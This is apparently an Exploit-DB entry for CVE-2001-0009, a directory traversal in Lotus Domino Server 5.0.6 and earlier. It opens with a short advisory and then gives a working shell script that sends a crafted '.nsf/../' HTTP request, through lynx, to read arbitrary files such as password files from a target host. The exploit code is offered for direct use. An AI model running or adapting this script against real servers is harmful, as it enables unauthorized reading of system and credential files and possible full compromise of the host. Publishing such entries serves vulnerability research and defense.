Lotus Domino Server 5.0.x - Directory Traversal (2)

EDB-ID:

20530

CVE:

2001-0009

EDB Verified:

Author:

Georgi Guninski

Type:

remote

Exploit:   /  

Platform:

Multiple

Date:

2001-01-05

Vulnerable App: 
source: https://www.securityfocus.com/bid/2173/info
 
It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions.
 
Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host.

#!/bin/sh

HOST=$1
PATH=$2

start()
{
	/usr/bin/lynx -dump http://$HOST/.nsf/../$PATH
}


if [ -n "$HOST" ]; then 
        start
else
        echo "$0 <host> <path>"
fi
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services